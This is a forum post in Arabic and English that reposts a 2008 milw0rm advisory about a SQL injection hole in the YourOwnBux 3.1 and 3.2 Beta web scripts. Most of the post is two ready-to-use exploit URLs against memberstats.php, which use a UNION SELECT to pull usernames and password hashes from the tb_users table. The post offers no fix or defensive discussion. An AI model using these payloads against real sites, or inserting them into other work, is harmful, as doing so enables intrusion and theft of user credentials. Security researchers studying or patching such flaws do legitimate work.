الموضوع: YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability
عرض مشاركة واحدة
 
قديم 08-28-2008, 08:33 AM   #1 (permalink)
alh000t
عضو نشيط






alh000t غير متصل

alh000t will become famous soon enoughalh000t will become famous soon enough

m3ic9 YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability
YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: YourOwnBux
Version: 3.1, 3.2
Price: $39.99
DEMO: yourownbux.com/demos/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

3.2 Beta version

Exploit:

كود:
http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*
3.1 version

Exploit:

كود:
http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*

معلومات

http://milw0rm.com/exploits/6321

التوقيع

  رد مع اقتباس